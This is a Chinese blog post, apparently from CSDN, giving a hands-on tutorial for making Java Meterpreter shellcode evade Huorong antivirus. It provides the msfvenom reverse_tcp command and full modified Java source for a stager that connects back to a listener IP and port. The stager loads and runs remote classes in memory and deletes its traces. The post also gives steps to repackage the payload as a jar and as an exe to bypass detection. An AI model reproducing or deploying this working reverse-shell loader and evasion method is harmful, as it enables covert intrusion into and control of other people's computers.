• 免杀对抗-java语言-shellcode免杀-源码修改+打包exe

    JAVA-ShellCode免杀-源码修改&打包EXE

    Shellcode-生成/上线

    1.msf生成shellcode

    命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar

    2.msf设置监听

    3.执行msf生成的shellcode jar包,成功上线

    命令:java -jar msf.jar

    4.上传到目标系统,直接被火绒检测出木马

     

    java免杀-修改源码进行免杀

    1.点击启动jd-gui,将生成的msf.jar拖入其中进行反编译,点击file—save all sources导出反编译后的内容

    下载jd-guihttps://github.com/java-decompiler/jd-gui/releases/download/v1.6.6/jd-gui-1.6.6.jar

    2.将导出的内容进行修改,然后在进行打包

    修改后内容:

    文件名:META-INF\MANIFEST.MF:

    1. Manifest-Version: 1.0
    2. Class-Path: .
    3. Main-Class: Main

    文件名:config:1

    文件名:Main.java:修改其中的ip和端口

    1. import java.io.DataInputStream;
    2. import java.io.File;
    3. import java.io.FileOutputStream;
    4. import java.io.IOException;
    5. import java.io.InputStream;
    6. import java.io.OutputStream;
    7. import java.net.Socket;
    8.  
    9. public class Main
    10.   extends ClassLoader
    11. {
    12.   private static final String JAVA = String.valueOf(System.getProperty("java.home")) + "/bin/java.exe";
    13.   
    14.   public static void main(String[] paramArrayOfString) throws Exception { runInBackground(); }
    15.  
    16.   
    17.   public static void runInBackground() throws Exception {
    18.     Class
       clazz = Main.class;
    19.     File file1 = File.createTempFile("~spawn", ".tmp");
    20.     file1.delete();
    21.     File file2 = new File(String.valueOf(file1.getAbsolutePath()) + ".dir");
    22.     file2.mkdir();
    23.     File file3 = new File(file2, String.valueOf(clazz.getName().replace(".", "/")) + ".class");
    24.     File file4 = new File(file2, "config");
    25.     if (readFile(Main.class, "config").equals("1")) {
    26.       writeFile(null, "config", file2, false, "0");
    27.       writeFile(clazz, String.valueOf(clazz.getName().replace(".", "/")) + ".class", file2, true, null);
    28.     } else {
    29.       
    30.       getShell();
    31.     } 
    32.     Runtime.getRuntime().exec(new String[] { JAVA, "-classpath", file2.getAbsolutePath(), clazz.getName() });
    33.     Thread.sleep(2000L);
    34.     File[] files = { file3, file4, file2 }; byte b; int i; File[] arrayOfFile;
    35.     for (i = (arrayOfFile = files).length, b = 0; b < i; ) { File f = arrayOfFile[b]; f.delete(); b++; }
    36.   
    37.   }
    38.   public static void writeFile(Class clazz, String name, File dir, boolean ifIsfile, String config) throws IOException {
    39.     InputStream inputStream = null;
    40.     if (ifIsfile) inputStream = clazz.getResourceAsStream("/" + name); 
    41.     File file = new File(dir, name);
    42.     file.getParentFile().mkdirs();
    43.     FileOutputStream fileOutputStream = new FileOutputStream(file);
    44.     byte[] b = new byte[4096];
    45.     if (ifIsfile) {
    46.       int i;
    47.       while ((i = inputStream.read(b)) != -1) {
    48.         fileOutputStream.write(b, 0, i);
    49.       }
    50.     } else {
    51.       fileOutputStream.write(config.getBytes());
    52.     } 
    53.     if (inputStream != null) inputStream.close(); 
    54.     fileOutputStream.close();
    55.   }
    56.   public static String readFile(Class clazz, String name) throws IOException {
    57.     InputStream inputStream = clazz.getResourceAsStream("/" + name);
    58.     StringBuffer str = new StringBuffer();
    59.     byte[] b = new byte[1024];
    60.     int i;
    61.     while ((i = inputStream.read(b)) != -1) {
    62.       str.append(new String(b, 0, i));
    63.     }
    64.     inputStream.close();
    65.     return str.toString();
    66.   }
    67.   public static void getShell() throws Exception {
    68.     InputStream inputStream1 = null;
    69.     OutputStream outputStream = null;
    70.     int j = (new Integer("4444")).intValue();
    71.     String str4 = "192.168.206.129";
    72.     Socket socket = null;
    73.     if (str4 != null) {
    74.       socket = new Socket(str4, j);
    75.     }
    76.     inputStream1 = socket.getInputStream();
    77.     outputStream = socket.getOutputStream();
    78.     (new Main()).bootstrap(inputStream1, outputStream);
    79.   }
    80.   
    81.   private final void bootstrap(InputStream paramInputStream, OutputStream paramOutputStream) throws Exception {
    82.     try {
    83.       Class clazz;
    84.       DataInputStream dataInputStream = new DataInputStream(paramInputStream);
    85.       int i = dataInputStream.readInt();
    86.       do {
    87.         byte[] arrayOfByte = new byte[i];
    88.         dataInputStream.readFully(arrayOfByte);
    89.         resolveClass(clazz = defineClass(null, arrayOfByte, 0, i));
    90.         i = dataInputStream.readInt();
    91.       } while (i > 0);
    92.       Object object = clazz.newInstance();
    93.       clazz.getMethod("start", new Class[] { DataInputStream.class, OutputStream.class, String[].class }).invoke(object, new Object[] { dataInputStream, paramOutputStream, new String[] {"",""} });
    94.     } catch (Throwable throwable) {
    95.     }
    96.   }
    97. }

    打包命令:javac Main.java

    3.执行命令,重新编译为jar包

    命令:jar cvfm 名称.jar META-INF/MANIFEST.MF .

    4.将jar包上传到目标系统,成功绕过火绒查杀

    5.执行jar包,msf成功上线

     

     

    Java免杀-JAR包打包EXE执行免杀

    将jar打包成exe教程:https://www.jb51.net/article/236000.htm

    需要使用的工具:

    exe4j-下载链接:https://exe4j.apponic.com/

    inno-下载链接:https://jrsoftware.org/isdl.php

    一、需要jdk环境才能运行的exe

    1.使用exe4j将msf生成的jar打包成exe程序,成功绕过火绒

    2.在目标系统有jdk环境的情况下,执行成功上线

     

    二、不需要jdk环境也能运行的exe

    1.将exe4j打包的exe程序再使用inno工具和jdk环境打包合并到一起,将文件上传目标系统,成功绕过检测

    注:什么jB作用没有。

  • 相关阅读:
    Docker - WEB应用实例
    各种存储性能瓶颈分析与优化方案
    设计模式——装饰器模式
    安全关闭Tcp连接
    Vue中给对象添加新属性时,界面不刷新怎么办?
    pandas学习(六) STATS
    Java前后端分离项目生成二维码链接带中文参数遇到的问题及解决办法
    Python笔记二之多线程
    YYGH-10-微信支付
    Liunx Jenkins 部署vue项目
  • 原文地址:https://blog.csdn.net/m0_51345235/article/details/133142281